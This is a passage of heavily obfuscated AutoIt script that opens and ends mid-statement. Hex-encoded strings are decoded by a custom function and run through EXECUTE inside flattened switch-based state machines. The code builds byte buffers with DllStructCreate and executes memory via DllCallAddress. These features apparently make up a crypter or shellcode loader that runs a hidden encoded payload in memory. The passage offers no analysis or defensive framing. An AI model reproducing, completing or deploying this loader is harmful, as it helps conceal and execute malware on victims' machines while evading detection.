("31793335373337403736374037453635374236353331333733313333353235373534353735373537353732373532323735323233353432373235323732373532323632393234323732313537353435373537353735373237353232373532323932393239323432373233353735343537353735373537353232363239323435333231353735353537353735373537323435323235353332373534323735373532323632393234353332353537353535373537353735373236323632373534323532353237353235323236323932343533323935373535353735373537353732373532323632323232323232323233353232363239323435333532353735353537353735373537323435323237323032373235323632373532323632393234353232313537353535373537353735373237323032363231323732383232323235323236323932343532323533331" ) ) ) $1931633093 = 383145765 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1584088969 LOCAL $GZXAPDO = $A ($B (MTDUDAQCWRWM ("307832343631373537343634363237373738364336333230323632303232343533353335343434333332333033383330333034333433343334333433343334333433343334333433343334333433343334333433343334333433343334333433343334333433333533313338343433343433333233343330333433323432343333383331343234333330343633373434333033323333343333383338343234333334333233353330333034363330343634363436343633333432343333383337333233303431333834323433333133353339333933343338343233303330333833393330333433323334343333333332343433303330333133303330333033303330333833353330333034353432343533393330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333032320" ) ) ) $1931633093 = 1988404486 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1596378509 LOCAL $XWDRKMH = $A ($B (MTDUDAQCWRWM ("3179333537453734373936313632363637343331333733313333353735373537323432313534323932383231353432353537353735373537323932383235323432323239323935353239323432323532353735373537353735373537323432313534323932393230353432353537353735373537323932383235323432323532323935353239323435323235353735343537353735373537323432313534323932363233353432353537353735373537323932383235323432353231323935353239323432333235353735323537353735373537323432313537353735333234353432353537323935373537353735373537353732383234353432393537323935373537353735373239323832353234323232313239353532393234323632353537353335373537353735373234323135373537353332343534323535373239353735373537353733331" ) ) ) $1931633093 = 258734893 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1598681996 LOCAL $SSMGQQLZ = $A ($B (MTDUDAQCWRWM ("347C3630333233333333323032353242333D36343632363436363734303230363032303230323032373137343031373C373037323031373D3032303230323032373C373D373C373130313037373437343734373437343734373C3030373C373137313037303230323032303230323032373137343031373C373737303031373D3032303230323032373C373D373C373137343730373437353734373437343734373C3030373C373137343730303230303032303230323032373137343031373C373637363031373D3032303230323032373C373D373C3731373D3037373437343734373437343734373C30303730373130353037373137343031373C373537373031373D3032303230323032373C373D373C37313734373C373437353734373437343734373C3030373C373130303037303230303032303230323032373137343031373C3734373536364" ) ) ) $1931633093 = 600999558 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1628863899 LOCAL $BJGJMTLT = $A ($B (MTDUDAQCWRWM ("337B313735413535343B343A3437353631333135313331313730303430373036373037303035373730353031303430303034303737303034303730363737303330353735303430343035303030343030303B303B303730363737303737303034303730363737303B30343030303430373034303130353730303530353730303430373036373737303035303630353736303B303B303730363737373637303034303B3036303737303735373637353735373537353036373030373731303537363035373537303034303B3036303630333735373637353735373537353034303430353736303730373035373037303034303B3036303630373735373637353735373537353035373030343030303030303030303137303034303B30363036303B3735373637353735373537353036373030353736303430373035303737303034303B3036303631313" ) ) ) $1931633093 = 1577018778 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1629885481 LOCAL $KGYRBCUTP = $A ($B (MTDUDAQCWRWM ("347C36303230333C333C3231324032373336323632303634363236343636373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373436364" ) ) ) $1931633093 = 62585352 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1636725757 LOCAL $ZMJHHKOE = $A ($B (MTDUDAQCWRWM ("30783234363636373734364536383741373137373230323632303232333634333336333533383338333833353434343134363435343634363436343634333337333833353333333434363434343634363436343633343435333733343335333333363335343333373338333533333338343634343436343634363436333733343335333633363331333634333433333733383335333334333436343434363436343634363337333533363335333434323336333533363336343333373338333533343330343634343436343634363436333733393330333034333337333833353336333434363434343634363436343633343435333733343334333333373332343333373338333533363338343634343436343634363436333633353336333133373334333633353433333733383335333634333436343434363436343634363334333633363339333632320" ) ) ) $1931633093 = 1972043913 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1640164563 LOCAL $A = EXECUTE (MTDUDAQCWRWM ("647964627475641" ) ) $1931633093 = 498628477 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1640970815 LOCAL $DETUUJGEC = $A ($B (MTDUDAQCWRWM ("337B3137353B3547353B3532353B353B3442343A354631333135313331313737303B303630363730373537353735373537353735303630333736303B30343031373637323735373537353735303B373137353033303B3737303730363732373030363033303B303A373130363736303B3735303B37353735373537353736303B30353032373637323735373537353735303B37313735303B303B3737303B30363032303B373537353735373537353735303630333735373537373034303B37313036373730323037303B303A303B3036373630373735303B3735373537353735303B3737303B3036303B3037373537303735373537353735303630333736303B30373032373637323735373537353735303B303A303B30363031303B303330323033303330333033303B3737303B30363031303737353732373537353735373530363033303B37373037303631313" ) ) ) $1931633093 = 1518103752 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1684484796 LOCAL $VJKROH = $A ($B (MTDUDAQCWRWM ("337B313734363432343135463430353A343A3133313531333131303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303331313" ) ) ) $1931633093 = 602231158 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1693206310 LOCAL $FFANXDKS = $A ($B (MTDUDAQCWRWM ("307832343738373637393634363336423230323632303232333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333032320" ) ) ) $1931633093 = 1146833423 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1699276693 LOCAL $DSXHAGTZT = $A ($B (MTDUDAQCWRWM ("307832343644363336443733363537373634363636383230323632303232343634363436333533303338343433383335343234333435343534363436343634363335333034363436343433373338343433383335343534333436343434363436343634363338333334333334333034333335333034363436343433363335333933343330333533303338343433383335343534333436343434363436343634363335333033383434333833353433343334363332343634363436343633353330343634363434333733383434333833353332333834363435343634363436343633383333343333343330343333353330343634363434333633353339333433303335333033383434333833353332333834363435343634363436343633353330333834343338333534313433343534313436343634363436333533303436343634343337333834343338333532320" ) ) ) $1931633093 = 315666680 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1706191730 LOCAL $PLIRGXFDO = $A ($B (MTDUDAQCWRWM ("337B31373430353735353436354135373535353A3133313531333131303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303331313" ) ) ) $1931633093 = 787260917 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1747070148 LOCAL $EAVVH = $A ($B (MTDUDAQCWRWM ("317933353639373437423738373237373331333733313333323132343231323432363237323932303537323132313231353732313231323935353235323435343231323432313239323832363535353532353537353732383234323932353231323032313231323132313239323435323231323632393533323432393533323532343535323132373530323532313234323632373530323132333239323832353234353532393239353532353234353532393234323132343236323432363234323632393535323532343537353232343231323735303537353735373537323632343534323135373537323832343236323932313230323132313231323132393234353232313236323932383231323935333235323732323235323932383235323435373239323935333235323435353231323932383235323435353532323935333235323433331" ) ) ) $1931633093 = 1570807129 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1752174969 LOCAL $KNXCVJDL = $A ($B (MTDUDAQCWRWM ("317933353742363637333632374237383742363237323331333733313333323432383235353432353537353735373537323432313537353735353236323935353239323435333231353735353537353735373537323932323532323532313532323432313537353735353237323432383235323132343231323935353239323435333231353735353537353735373537323432313239353532393234323835323534323735373537353735373234323135373537353532363239353532393234323832353537353535373537353735373239323235323235323135323234323135373537353532373234323832353231323432313239353532393234323832353537353535373537353735373234323132393535323932343535353235373237353735373537353732343231353735373535323632393535323932343230323135373534353735373537353733331" ) ) ) $1931633093 = 421435348 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1762338784 LOCAL $OPKDPJAE = $A ($B (MTDUDAQCWRWM ("307832343634364236373645364436313230323632303232343134333436343334363436343634363337333233363436333633333336333533363336343333373338333534323330343634333436343634363436333733333337333333383338333833353432333234363433343634363436343634333337333833353433333034363431343634363436343633343435333733343334333633373332343333373338333534333334343634313436343634363436333633353336333533353336333633393433333733383335343333383436343134363436343634363337333233373334333733353336333134333337333833353433343334363431343634363436343633363433333434343336333533363434343333373338333534343330343634313436343634363436333634363337333233373339333033303433333733383335333532320" ) ) ) $1931633093 = 615978281 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1766663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("66756D70662" ) , $Z56D5656Q , MTDUDAQCWRWM ("7275731" ) , EXECUTE (STRINGREVERSE (BINARYTOSTRING (MTDUDAQCWRWM ("337B3" ) & $GF6DF148745 ) ) ) , MTDUDAQCWRWM ("7175731" ) , DLLSTRUCTGETPTR ($I5U6G ) ) [0 ] $1931633093 = 536163955 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1814921641 LOCAL $EZEWZOW = $A ($B (MTDUDAQCWRWM ("317933353738363137303733363737353633373537383331333733313333323932343238323132313231323132313231323132393535323932343534353235373239353735373537353732343231353432393238323635343237353735373537353732393238323932343230323532313230323132313231323132393535323932343230323535373535353735373537353732343231353432393239323435343237353735373537353732393533323435353230323532393238323932343232323932313230323132313231323132393535323932343533323535373532353735373537353732343231353432393236323135343237353735373537353732393238323932343535323932313231323132313231323132393535323532343535323932343231323935333535353435343239323435373534323735373537353735373239323832393234323233331" ) ) ) $1931633093 = 689797956 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1815561647 LOCAL $AUTDBWXLC = $A ($B (MTDUDAQCWRWM ("317933353639363536393740374736323331333733313333323032313231323132313234323832343231323935353239323532333235323935323231323032313231323132313234323732343231353735373238323532333235323732313231323032313231323132313239323235323235323135323232323235323231323932323537353332373235323635353233323832393230353435323236323932313230323132313231323132373530323435343234323832393533353735323537353732363234323135323239353532393235323332353231323532313232323132313231323132393535353332353233323532393532323132303231323132313231323432313537323235303234353432393532353735373532353735373537353732353232323932343532323132363235353532333234353732343534323435333239353333331" ) ) ) $1931633093 = 1584088969 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1844884533 LOCAL $BCCXEJY = $A ($B (MTDUDAQCWRWM ("3078323436353736373336443636363936383230323632303232333833353331343334363432343634363436343633363335333434353336333133363434333633363433333733383335333233303436343234363436343634363336333533343331333833383338333533323332343634323436343634363436343333373338333534343433343633393436343634363436333434353337333433353331333733353433333733383335343533303436333934363436343634363336333533373332333733393334333934333337333833353435333434363339343634363436343633363435333633363336343633373332343333373338333534353338343633393436343634363436333634343336333133373334333633393433333733383335343534333436333934363436343634363336343633363435333433363336333933363336343332320" ) ) ) $1931633093 = 1238590072 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1857967641 $1931633093 = 1174631798 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1859852671 LOCAL $UVILKQV = $A ($B (MTDUDAQCWRWM ("30783234373536393639373737323230323632303232333033303338343433383335333034333436343634363436343634363335333034353338343333393435333734363436343634363338333933383335333134333330333133303330333033303338343433383335333233343436343434363436343634363335333034353338343233373435333734363436343634363338333933383335343133303330333033303330333033303338343433383335333434333436343234363436343634363335333034353338343133353435333734363436343634363338333933383335333834333330333033303330333033303338343433383335343333343436333934363436343634363335333034353338333933333435333734363436343634363338333933383335343633343330333033303330333033303338343433383335343432320" ) ) ) $1931633093 = 1125384096 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1871778911 $A ($B (MTDUDAQCWRWM ("317935353742374234323635363336343732363534323734363535353730363537303339333537383234363432373736334233313333323537373735363233333342333133353735363232353637363232393632363733381" ) ) ) $1931633093 = 1766663092 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1896016662 LOCAL $KKHCOLW = $A ($B (MTDUDAQCWRWM ("347C36303336333D33453332324632373331333D32353634363236343636373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373436364" ) ) ) $1931633093 = 1014003319 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1899827879 LOCAL $YWILF = $A ($B (MTDUDAQCWRWM ("307832343631364637333733373436353230323632303232333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333032320" ) ) ) $1931633093 = 395587655 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1958988917 LOCAL $QGYECPWAM = $A ($B (MTDUDAQCWRWM ("347C36303232333C333232353235363436323634363637313735373C3032303230323032303230323730303237323037373237313737373730373733373C373137353037303230323032303230323032373737363736303137323730373230373732373230373733373C373137363734303230323032303230323032373230373734373430373733373C3731373737303032303730323032303230323730303137333730373037373733373630373733373C37313737373C3032303730323032303230323732373137323735373337303732373130373733373C373137373037303230373032303230323032373030303733373137333730373237353732373230373733373C3731373037343032303730323032303230323732303137333730373C373C373C37313730373630323037303230323032303230373733373C37313730373036364" ) ) ) $1931633093 = 909828637 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1972043913 LOCAL $YBRJY = $A ($B (MTDUDAQCWRWM ("31793335364037453740373937393743374737343331333733313333353232373234323932393239323432363231353735353537353735373537353232363239323432313235353735343537353735373537323535343236323532343236323632333532323632393234323132393537353435373537353735373237323832363235323732343235323735323236323932343231353235373534353735373537353732373238323735323237323432313231353232363239323435343532353732393537353735373537323432333236323532373532323532373532323632393234353732313537323935373537353735373237353732363233323735353237323035323236323932343537323535373239353735373537353732363235323532323236323432363233353232363239323435373239353732393537353735373537323632333237323433331" ) ) ) $1931633093 = 1129416656 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1974000802 LOCAL $LYIWMDQCC = $A ($B (MTDUDAQCWRWM ("347C3630333D323633303241334532323634363236343636373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373436364" ) ) ) $1931633093 = 1575083007 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1988404486 LOCAL $EQNSJZVB = $A ($B (MTDUDAQCWRWM ("3078323436373741373836313730363436463230323632303232333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333032320" ) ) ) $1931633093 = 1262198596 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1991785796 LOCAL $ZEELGK = $A ($B (MTDUDAQCWRWM ("337B31373545353134323431353235463133313531333131303137353730373537353735373537303034303B30363731303B373537363735373537353735303630303035303B303537353034303437303034303B303637313730373537363735373537353735303630343035303A30353736303530373035303537303034303B3036373030333735373637353735373537353035373530343034303B303B303B30363730303137353736373537353735373537303034303B3036373030373735373137353735373537353037303030343031303530363035303237303034303B30363730303B3735373137353735373537353034303730353036303630343035303A37303034303B3036373037303735373137353735373537353035373630353037303537353034303437303034303B3036373730333735373137353735373537353037303631313" ) ) ) $1931633093 = 776185208 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1993050705 LOCAL $QOVZH = $A ($B (MTDUDAQCWRWM ("3078323436433646363536453733373837353230323632303232333733383335333533343436343334363436343634363334343533373334333433353336343534333337333833353335333834363433343634363436343633373335333634343336333533373332343333373338333533353433343634333436343634363436333633313337333433363335333434323336333634333337333833353336333034363433343634363436343633363335333733393338333833383335333633323436343334363436343634363433333733343335333833343336343433363335333634343336333333363336343333373334333533383338333733303337333933383338333433353338343134333337333833353332333434363431343634363436343633343333333733323337333933373330343333373338333533323338343634313436343632320" ) ) ) $1931633093 = 812875559 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1994269651 LOCAL $OBQRAN = $A ($B (MTDUDAQCWRWM ("327A3036343B343334473433353B35433443344730323034303230303634313A3634363336343634363436343134313731353131313531313132313236313135313A31373136313A3634363436343634363436343135313531343131313531313135313636313135313A31373136363136343634363436343634363431343634313436363134313031353131313A313A313A31373137313236343634363436343634363436313135313A3137363131363634363136343634363436343136363731353136313731333135313736313135313A31373631313A36343631363436343634363431343137313531303135313B3137313136313135313A3137363136313634363136343634363436343134313731343131313531363134313B3134313436313135313A3137363631323634363136343634363436343134363431343637313A313A313A3137363630302" ) ) ) $1931633093 = 1991785796 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2024172577 LOCAL $ZVFFBOYUU = $A ($B (MTDUDAQCWRWM ("337B31373532354035463536353A3434313331353133313130343037373537303034303B3036303530333735373237353735373537353035303530363030303530363035303037303034303B303630353037373537323735373537353735303430373035303A3035373530353736303B303B303B30363035303B37353732373537353735373537303034303B3036303430373735373037353735373537353037373630343037303630313035303637303034303B30363034303B3735373037353735373537353034303030343036303537373035303637303034303B303630343730373537303735373537353735303630373035303B30343031303530363035303537303034303B3036303B30333735373037353735373537353035303230353037303B303B303B3036303B303137353730373537353735373537303034303B30363031303731313" ) ) ) $1931633093 = 1155583430 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2029313846 LOCAL $JDXKTSPDE = $A ($B (MTDUDAQCWRWM ("347C3630323C32403330323C333C323133303634363236343636373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373436364" ) ) ) $1931633093 = 714709978 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2044148400 LOCAL $IVGZPILLY = $A ($B (MTDUDAQCWRWM ("337B31373431343B34343535343A313331353133313137353735373537353735373537303034303730363736373030353032303530373034303530353032373030343037303637353033303430333035303A303030303030303137303034303730363735303730313736303530373035373030353730303B303B303730363735303B37303034303B3036303030333735373537353735373537353035373030343030303430373034303137303034303B30363030303737353735373537353735373530353730303530363035373630363034303B303B303B30363030303B37353735373537353735373537303034303B3036373030373735303A37353735373537353037373630343037303630333034303137303034303B30363730303B3735303A37353735373537353035373530343037303530363035303037303034303B3036373031313" ) ) ) $1931633093 = 1493453038 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2051857597 LOCAL $DXXEMCRBD = $A ($B (MTDUDAQCWRWM ("307832343643364236353734363837333632363236453230323632303232333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333032320" ) ) ) $1931633093 = 1629885481 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2069342920 LOCAL $UWMZARZX = $A ($B (MTDUDAQCWRWM ("337B313734313545343435413537353B3133313531333131303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303331313" ) ) ) $1931633093 = 864479061 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2079397349 LOCAL $IAYRSXUMG = $A ($B (MTDUDAQCWRWM ("327A30363447343B3532343A353535353032303430323030313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313230302" ) ) ) $1931633093 = 1558516272 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2087865545 LOCAL $IPABVDRDI = $A ($B (MTDUDAQCWRWM ("327A30363441344635313437353A3433353B35323441303230343032303031343634363436343634313A313B313A31373133313A313231333132313231323132313A3636313A31373131313A363436303634363436343634313731323637313A36363634363731343634363436343634313A313B313A31373137313A313231333132313231323132313A3636313A313731323136363436373634363436343634313731323637313A36313636363731343634363436343634313A313B313A313731323631313231333132313231323132313A3636313A313731313631363436333634363436343634313731323637313A36303630363731343634363436343634313A313B313A313731343631313231333132313231323132313A3636313A313736333631363436333634363436343634313731323637313A3633313B363731343634363436343634313A313B30302" ) ) ) $1931633093 = 1814921641 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 ENDSWITCH UNTIL $AW1LULG3Q9 = 1135290 ENDFUNC FUNC KODZMEKGBG ($FDS1G1DEZE ) GLOBAL $353768791 = 66485247 GLOBAL $QBTCYTKZIB = 3958391 DO ISBINARY (MTDUDAQCWRWM ("414B69796F72524F53593468517530793643584A556169546B656B58486471314875466B333573524A574C4F334B3545724C4C68317A3041427A6F6A6833684F47634A75594F0" ) ) SWITCH $353768791 CASE 66485247 LOCAL $ZAA = EXECUTE (MTDUDAQCWRWM ("647964627475641" ) ) $353768791 = 1640164563 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 188325663 LOCAL $UY5QE2DGDG253 = $ZAA ($ZZ (MTDUDAQCWRWM ("3078343436433643353337343732373536333734343337323635363137343635323832323632373937343635323037333638363536433643363336463634363535423232323032363230343236393645363137323739344336353645323832343732374133313734373236383332333537323741363537323239323032363230323235443232324332303234364636383333363732390" ) ) ) $353768791 = 1363940638 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 461545339 LOCAL $RZ1TRH25RZER = MTDUDAQCWRWM ("337B403B32333332333335423333354233333630363536343B41363632333032403A3B3A403B373A3B3A473445314246373B373B313A403B3B3A373645333B36403333453B374740333333333333413A33333332333333333B3B403B314033323B3B3B3733474645454645454545463145303B303536453733333B303536454033333B32344745403333333233333333344737343B4137364540303247314534343645333A313330373632333345413533333B4137474540334541353B40334745334546454545453332403B333037364537313645453333333333333B3A373645373B41343645403B423B37303645334546454545453B41344745373B353B37304745334546454545453B3B3B3730364533454645454545454537364540464141333B473A474533454645454545303245453B3A4542303A36363340343535303B413B3646404546454545453733313645453333333333333B3A3B3646404546454545453B3A473B33303B36464045464545454533454135333333303B36463B454645454545313645453333333333333B3A3B36463B4546454545453B3A47463330413646404546454545453B4233353B3A474533304147463B4546454545453B3533343B3B3335334541353346334541353334333240323B32463245453333333333333B423B37334745334546454545453B413436333B3332473530333335373146413A3B364536463641403A4031323333333" ) $353768791 = 659661563 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 498628477 DIM $ZAEPFPD5SDF = $ZAA ($ZZ (MTDUDAQCWRWM ("317934323635363337383764373634333734363737343633363237343339353337383764373036333638343537673432363536333738376437363339333537373737373536323632363237353734333833381" ) ) ) $353768791 = 461545339 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 560679029 $ZAA ($ZZ (MTDUDAQCWRWM ("337B3737354035403630343734313436353034373630353634373737353234373532313B31373436343A3036343235363031353735343537353430313036303031403133303231403133313734313442303234373431353B303130363431344235363431313A3" ) ) ) $353768791 = 1163514766 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 659661563 LOCAL $OH3G = $ZAA ($ZZ (MTDUDAQCWRWM ("347C3030324732473037323532473247363C363632463231333632413231324737373736363636473634363633343330333636363647363436363132323D3336333033313235324730353247324732423237363636473634363632303333324233363230363636473634363637343636364736343636323033333242333632303636364736343036323D324132353336333D304732313241363C363033363345373533303336323C373637313336334532313336363D3634364636343036323D324132353336333D304732313241363C363033453235323133343232333432303731333732303232363D3647363436363230333332423336323036363647363436363734333C373737343734373436363647363436363230333332423336323036363647363436363734333C373037343636363D314636363734363631404" ) ) ) $353768791 = 1396810998 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 1109624799 RETURN $ZAA ($ZZ (MTDUDAQCWRWM ("307834343643364335333734373237353633373434373635373434343631373436313238323436363634373333353637333636343336363432433230333132390" ) ) ) $QBTCYTKZIB = 3958404 CASE 1163514766 $ZAA ($ZZ (MTDUDAQCWRWM ("327A3636344134413731353635303537343135363731343735363636343335363433303A303634343436353131373435313434363134343630413032313330413032303635433433343735323434353234363137353134363434303B2" ) ) ) $353768791 = 1304958308 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 1178569399 LOCAL $FDS5G6D6D = $ZAA ($ZZ (MTDUDAQCWRWM ("327A363634413441373135363530353734313536363135303437343335363437303A30303430353B35363437374030303032303430323630343B344734333530353B364134373447303A303635433433343735323434353234363137353134363434303B303230343032303037463030303B2" ) ) ) $353768791 = 560679029 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 1304958308 $ZAA ($ZZ (MTDUDAQCWRWM ("30783434364336433433363136433643343136343634373236353733373332383232363437373646373236343232324332303234364636383333363732433230323237303734373232323243323034343643364335333734373237353633373434373635373435303734373232383234363636343733333536373336363433363634323932433230323236393645373432323243323034323639364536313732373934433635364532383234374136313635373036363730363433353733363436363239324332303232373337343732323232433230343236393645363137323739353436463533373437323639364536373238323436363634373333313637333136343635374136353239324332303232363936453734323232433230333032390" ) ) ) $353768791 = 1109624799 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 1363940638 $ZAA ($ZZ (MTDUDAQCWRWM ("337B3737354035403630343734313436353034373630353634373737353234373532313B313730373432353435353430353735373442344231403133303231403133313734313442303234373431353B303130363431344235363431313A3" ) ) ) $353768791 = 1178569399 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 1396810998 LOCAL $4QGFSDDZZ = $ZAA ($ZZ (MTDUDAQCWRWM ("30783434364336433533373437323735363337343433373236353631373436353238323236323739373436353542323232303236323034323639364536313732373934433635364532383234373237413331373437323638333233353732374136353732323932303236323032323544323232390" ) ) ) $353768791 = 188325663 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 1640164563 LOCAL $ZZ = $ZAA (MTDUDAQCWRWM ("666D6A65767D704" ) & MTDUDAQCWRWM ("6C7077716A6D643" ) ) $353768791 = 498628477 $QBTCYTKZIB = $QBTCYTKZIB + 1 ENDSWITCH DIM $A7YDZIJQE5AJAHDFTDQJJQN6H1BJQMFK7VZ3B7JQ9BYLOXCB1T = MTDUDAQCWRWM ("3733323D3435304" ) + 1324738 UNTIL $QBTCYTKZIB = 3958404 ENDFUNC FUNC AA ($EGF75X7FDSVGF , $F7DGFSDG4VC44PO ) GLOBAL $1178569399 = 66485247 GLOBAL $FTSBW8HJA2 = 45870 DO MOD (956639 , 2827432 ) SWITCH $1178569399 CASE 66485247 LOCAL $SSZ = EXECUTE (MTDUDAQCWRWM ("647964627475641" ) ) $1178569399 = 1640164563 $FTSBW8HJA2 = $FTSBW8HJA2 + 1 CASE 188325663 LOCAL $B57GFD89BDS = $SSZ ($DF45 (MTDUDAQCWRWM ("347C3030326732673037323532673267363C3636326632313336326132313267373737363636366736343636333433303336363636673634363630673262323732663136323133373262333133363237323136363667363436363334333033363636366736343630336532313331323D32323265323033653235323D3230363D316636363734363631604" ) ) ) $1178569399 = 1363940638 $FTSBW8HJA2 = $FTSBW8HJA2 + 1 CASE 461545339 LOCAL $QREZ7SGFSF = $SSZ ($DF45 (MTDUDAQCWRWM 